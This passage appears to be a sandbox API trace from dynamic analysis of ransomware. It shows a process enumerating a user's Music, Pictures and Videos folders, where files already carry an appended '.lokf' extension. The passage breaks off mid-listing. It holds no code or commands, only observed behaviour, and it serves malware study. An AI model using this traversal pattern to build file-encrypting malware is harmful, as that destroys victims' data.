PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.272] PathFindFileNameW (pszPath="") returned="" [0148.272] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9fc49d0, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0x20efa550, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20efa550, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.273] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd9fc49d0, ftCreationTime.dwHighDateTime=0x1d4cefb, ftLastAccessTime.dwLowDateTime=0x20efa550, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x20efa550, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.273] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd23ae240, ftCreationTime.dwHighDateTime=0x1d4d47a, ftLastAccessTime.dwLowDateTime=0x3de8b5f0, ftLastAccessTime.dwHighDateTime=0x1d4cf88, ftLastWriteTime.dwLowDateTime=0x20e15d10, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x13052, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2frIwLIsuulHRSHkT.wav.lokf", cAlternateFileName="2FRIWL~1.LOK")) returned 1 [0148.273] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\2frIwLIsuulHRSHkT.wav.lokf") returned=".lokf" [0148.273] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x48f3b7c0, ftCreationTime.dwHighDateTime=0x1d4d360, ftLastAccessTime.dwLowDateTime=0xe47237a0, ftLastAccessTime.dwHighDateTime=0x1d4c5da, ftLastWriteTime.dwLowDateTime=0x20eae290, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5057, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2u2pj-4.mp3.lokf", cAlternateFileName="2U2PJ-~1.LOK")) returned 1 [0148.273] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\2u2pj-4.mp3.lokf") returned=".lokf" [0148.273] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6cf8ec10, ftCreationTime.dwHighDateTime=0x1d4c818, ftLastAccessTime.dwLowDateTime=0xe97a1e80, ftLastAccessTime.dwHighDateTime=0x1d4cf43, ftLastWriteTime.dwLowDateTime=0x20ed43f0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x82d1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="DgdvfX7vLuA3.m4a.lokf", cAlternateFileName="DGDVFX~1.LOK")) returned 1 [0148.273] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\DgdvfX7vLuA3.m4a.lokf") returned=".lokf" [0148.273] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x66899650, ftCreationTime.dwHighDateTime=0x1d4c80d, ftLastAccessTime.dwLowDateTime=0x2142f570, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x2142f570, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iCD5MmspTIMUES", cAlternateFileName="ICD5MM~1")) returned 1 [0148.273] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17b88290, ftCreationTime.dwHighDateTime=0x1d4ce5f, ftLastAccessTime.dwLowDateTime=0x6b0dc390, ftLastAccessTime.dwHighDateTime=0x1d4c939, ftLastWriteTime.dwLowDateTime=0x20efa550, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xca8, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="OAddPqhDn.mp3.lokf", cAlternateFileName="OADDPQ~1.LOK")) returned 1 [0148.273] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\OAddPqhDn.mp3.lokf") returned=".lokf" [0148.273] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a6a55a0, ftCreationTime.dwHighDateTime=0x1d4c6b7, ftLastAccessTime.dwLowDateTime=0xbdddd1d0, ftLastAccessTime.dwHighDateTime=0x1d4d273, ftLastWriteTime.dwLowDateTime=0x20efa550, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x8a85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zoG7hAdVK.wav.lokf", cAlternateFileName="ZOG7HA~1.LOK")) returned 1 [0148.273] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\m4--j\\zoG7hAdVK.wav.lokf") returned=".lokf" [0148.273] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a6a55a0, ftCreationTime.dwHighDateTime=0x1d4c6b7, ftLastAccessTime.dwLowDateTime=0xbdddd1d0, ftLastAccessTime.dwHighDateTime=0x1d4d273, ftLastWriteTime.dwLowDateTime=0x20efa550, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x8a85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zoG7hAdVK.wav.lokf", cAlternateFileName="ZOG7HA~1.LOK")) returned 0 [0148.273] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.274] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.274] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.274] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\") returned="Pt3T5YLjsfWTS8bTn\\" [0148.274] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\") returned="Pictures\\" [0148.274] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.274] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.274] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.274] PathFindFileNameW (pszPath="") returned="" [0148.275] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527b5a80, ftCreationTime.dwHighDateTime=0x1d4d17d, ftLastAccessTime.dwLowDateTime=0x21004ef0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21004ef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.275] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x527b5a80, ftCreationTime.dwHighDateTime=0x1d4d17d, ftLastAccessTime.dwLowDateTime=0x21004ef0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21004ef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.275] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8e234ca0, ftCreationTime.dwHighDateTime=0x1d4d42a, ftLastAccessTime.dwLowDateTime=0x40d4c3b0, ftLastAccessTime.dwHighDateTime=0x1d4c553, ftLastWriteTime.dwLowDateTime=0x20f206b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x11e32, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="af7fMK0 C.gif.lokf", cAlternateFileName="AF7FMK~1.LOK")) returned 1 [0148.276] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\af7fMK0 C.gif.lokf") returned=".lokf" [0148.276] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb395b20, ftCreationTime.dwHighDateTime=0x1d4c776, ftLastAccessTime.dwLowDateTime=0x4683c680, ftLastAccessTime.dwHighDateTime=0x1d4d48f, ftLastWriteTime.dwLowDateTime=0x20f46810, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5784, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AjNKcaGLMrNbgB.gif.lokf", cAlternateFileName="AJNKCA~1.LOK")) returned 1 [0148.276] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\AjNKcaGLMrNbgB.gif.lokf") returned=".lokf" [0148.276] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5c4f5440, ftCreationTime.dwHighDateTime=0x1d4cfb5, ftLastAccessTime.dwLowDateTime=0xfbbc1990, ftLastAccessTime.dwHighDateTime=0x1d4c6f6, ftLastWriteTime.dwLowDateTime=0x20f6c970, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x135b2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="f0kq4mu0SkEws8GQakO.gif.lokf", cAlternateFileName="F0KQ4M~1.LOK")) returned 1 [0148.276] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\f0kq4mu0SkEws8GQakO.gif.lokf") returned=".lokf" [0148.276] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1551a9b0, ftCreationTime.dwHighDateTime=0x1d4cd78, ftLastAccessTime.dwLowDateTime=0xf833a320, ftLastAccessTime.dwHighDateTime=0x1d4d18b, ftLastWriteTime.dwLowDateTime=0x20f6c970, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x393a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="li369zaQPHRBOjAeQzQZ.png.lokf", cAlternateFileName="LI369Z~1.LOK")) returned 1 [0148.276] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\li369zaQPHRBOjAeQzQZ.png.lokf") returned=".lokf" [0148.276] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb735d2d0, ftCreationTime.dwHighDateTime=0x1d4ced9, ftLastAccessTime.dwLowDateTime=0x850e5050, ftLastAccessTime.dwHighDateTime=0x1d4ca71, ftLastWriteTime.dwLowDateTime=0x20f92ad0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xeab2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MJFA.gif.lokf", cAlternateFileName="MJFAGI~1.LOK")) returned 1 [0148.276] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\MJFA.gif.lokf") returned=".lokf" [0148.276] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16bdfe0, ftCreationTime.dwHighDateTime=0x1d4d176, ftLastAccessTime.dwLowDateTime=0x9fe27420, ftLastAccessTime.dwHighDateTime=0x1d4cc82, ftLastWriteTime.dwLowDateTime=0x20f92ad0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xe32c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="N3M3Ys.jpg.lokf", cAlternateFileName="N3M3YS~1.LOK")) returned 1 [0148.277] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\N3M3Ys.jpg.lokf") returned=".lokf" [0148.277] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x42598f70, ftCreationTime.dwHighDateTime=0x1d4c8f7, ftLastAccessTime.dwLowDateTime=0x59e53050, ftLastAccessTime.dwHighDateTime=0x1d4c7d9, ftLastWriteTime.dwLowDateTime=0x20fb8c30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x9055, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NrGoI7QxowPF0QY4.png.lokf", cAlternateFileName="NRGOI7~1.LOK")) returned 1 [0148.277] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\NrGoI7QxowPF0QY4.png.lokf") returned=".lokf" [0148.277] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9ae2fc70, ftCreationTime.dwHighDateTime=0x1d4cd03, ftLastAccessTime.dwLowDateTime=0x60ead820, ftLastAccessTime.dwHighDateTime=0x1d4c8e0, ftLastWriteTime.dwLowDateTime=0x20fb8c30, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x475b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="o1B17VGvl2Lz.jpg.lokf", cAlternateFileName="O1B17V~1.LOK")) returned 1 [0148.277] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\o1B17VGvl2Lz.jpg.lokf") returned=".lokf" [0148.277] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbe9eaeb0, ftCreationTime.dwHighDateTime=0x1d4d411, ftLastAccessTime.dwLowDateTime=0xd261be60, ftLastAccessTime.dwHighDateTime=0x1d4d2bd, ftLastWriteTime.dwLowDateTime=0x20fded90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1481, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="RqbMGhYZcZtImp-D.bmp.lokf", cAlternateFileName="RQBMGH~1.LOK")) returned 1 [0148.277] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\RqbMGhYZcZtImp-D.bmp.lokf") returned=".lokf" [0148.277] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x552e3520, ftCreationTime.dwHighDateTime=0x1d4d1e3, ftLastAccessTime.dwLowDateTime=0x1ee03350, ftLastAccessTime.dwHighDateTime=0x1d4cf50, ftLastWriteTime.dwLowDateTime=0x20fded90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x10680, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="VO-3YD 39RUJPvDS.bmp.lokf", cAlternateFileName="VO-3YD~1.LOK")) returned 1 [0148.277] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\VO-3YD 39RUJPvDS.bmp.lokf") returned=".lokf" [0148.277] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb2f2e040, ftCreationTime.dwHighDateTime=0x1d4cf4d, ftLastAccessTime.dwLowDateTime=0x20b7a9b0, ftLastAccessTime.dwHighDateTime=0x1d4ca32, ftLastWriteTime.dwLowDateTime=0x20fded90, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x3bea, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="WY02osvbjefKkY2aG.bmp.lokf", cAlternateFileName="WY02OS~1.LOK")) returned 1 [0148.277] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\WY02osvbjefKkY2aG.bmp.lokf") returned=".lokf" [0148.277] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9665af0, ftCreationTime.dwHighDateTime=0x1d4cca2, ftLastAccessTime.dwLowDateTime=0x474e7720, ftLastAccessTime.dwHighDateTime=0x1d4c776, ftLastWriteTime.dwLowDateTime=0x21004ef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x313d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xjvwDn0SBdqUu-KgqN.jpg.lokf", cAlternateFileName="XJVWDN~1.LOK")) returned 1 [0148.277] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Pt3T5YLjsfWTS8bTn\\xjvwDn0SBdqUu-KgqN.jpg.lokf") returned=".lokf" [0148.277] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf9665af0, ftCreationTime.dwHighDateTime=0x1d4cca2, ftLastAccessTime.dwLowDateTime=0x474e7720, ftLastAccessTime.dwHighDateTime=0x1d4c776, ftLastWriteTime.dwLowDateTime=0x21004ef0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x313d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="xjvwDn0SBdqUu-KgqN.jpg.lokf", cAlternateFileName="XJVWDN~1.LOK")) returned 0 [0148.277] FindClose (in: hFindFile=0x3220d58 | out: hFindFile=0x3220d58) returned 1 [0148.278] PeekMessageW (in: lpMsg=0x391ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391ff08) returned 0 [0148.278] PeekMessageW (in: lpMsg=0x391fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x391fb74) returned 0 [0148.278] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\") returned="27nF\\" [0148.278] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0148.278] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0148.278] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0148.278] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0148.278] PathFindFileNameW (pszPath="") returned="" [0148.278] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\*", lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8d443130, ftCreationTime.dwHighDateTime=0x1d4cddd, ftLastAccessTime.dwLowDateTime=0x210c35d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x210c35d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3220d58 [0148.279] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x8d443130, ftCreationTime.dwHighDateTime=0x1d4cddd, ftLastAccessTime.dwLowDateTime=0x210c35d0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x210c35d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0148.279] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x66d6f180, ftCreationTime.dwHighDateTime=0x1d4cbc7, ftLastAccessTime.dwLowDateTime=0xddf858e0, ftLastAccessTime.dwHighDateTime=0x1d4c6f3, ftLastWriteTime.dwLowDateTime=0x2102b050, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x725e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2-PB.swf.lokf", cAlternateFileName="2-PBSW~1.LOK")) returned 1 [0148.279] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\2-PB.swf.lokf") returned=".lokf" [0148.279] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0d75ca0, ftCreationTime.dwHighDateTime=0x1d4c570, ftLastAccessTime.dwLowDateTime=0x2e856740, ftLastAccessTime.dwHighDateTime=0x1d4d2e7, ftLastWriteTime.dwLowDateTime=0x210511b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x436e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3gmurZa_KyIq0.mkv.lokf", cAlternateFileName="3GMURZ~1.LOK")) returned 1 [0148.279] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\3gmurZa_KyIq0.mkv.lokf") returned=".lokf" [0148.279] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x31597820, ftCreationTime.dwHighDateTime=0x1d4ceb0, ftLastAccessTime.dwLowDateTime=0x33cf29c0, ftLastAccessTime.dwHighDateTime=0x1d4d2e7, ftLastWriteTime.dwLowDateTime=0x210511b0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x8b42, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="3SncxiCXlF02Ky2.swf.lokf", cAlternateFileName="3SNCXI~1.LOK")) returned 1 [0148.279] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\3SncxiCXlF02Ky2.swf.lokf") returned=".lokf" [0148.279] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xefa39060, ftCreationTime.dwHighDateTime=0x1d4c634, ftLastAccessTime.dwLowDateTime=0x830d9de0, ftLastAccessTime.dwHighDateTime=0x1d4c87a, ftLastWriteTime.dwLowDateTime=0x21077310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x8b50, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="5OM_K.avi.lokf", cAlternateFileName="5OM_KA~1.LOK")) returned 1 [0148.279] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\5OM_K.avi.lokf") returned=".lokf" [0148.279] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xe10f690, ftCreationTime.dwHighDateTime=0x1d4c690, ftLastAccessTime.dwLowDateTime=0xaf3ca600, ftLastAccessTime.dwHighDateTime=0x1d4d332, ftLastWriteTime.dwLowDateTime=0x21077310, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0xc0f2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Gn4 UcsB.flv.lokf", cAlternateFileName="GN4UCS~1.LOK")) returned 1 [0148.279] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\Gn4 UcsB.flv.lokf") returned=".lokf" [0148.279] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2f684a50, ftCreationTime.dwHighDateTime=0x1d4c54b, ftLastAccessTime.dwLowDateTime=0x37621020, ftLastAccessTime.dwHighDateTime=0x1d4c694, ftLastWriteTime.dwLowDateTime=0x2109d470, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x1aaf, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="H85jqiLOTT6NBZY.swf.lokf", cAlternateFileName="H85JQI~1.LOK")) returned 1 [0148.280] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\H85jqiLOTT6NBZY.swf.lokf") returned=".lokf" [0148.280] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xd795f920, ftCreationTime.dwHighDateTime=0x1d4cad2, ftLastAccessTime.dwLowDateTime=0x995d6f10, ftLastAccessTime.dwHighDateTime=0x1d4d1ff, ftLastWriteTime.dwLowDateTime=0x210c35d0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x5d64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HXLOhG.swf.lokf", cAlternateFileName="HXLOHG~1.LOK")) returned 1 [0148.280] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\HXLOhG.swf.lokf") returned=".lokf" [0148.280] FindNextFileW (in: hFindFile=0x3220d58, lpFindFileData=0x391fba4 | out: lpFindFileData=0x391fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf3b2a300, ftCreationTime.dwHighDateTime=0x1d4cba5, ftLastAccessTime.dwLowDateTime=0x21513db0, ftLastAccessTime.dwHighDateTime=0x1d5956a, ftLastWriteTime.dwLowDateTime=0x21513db0, ftLastWriteTime.dwHighDateTime=0x1d5956a, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="m Cm9nOn1JJtRb93m", 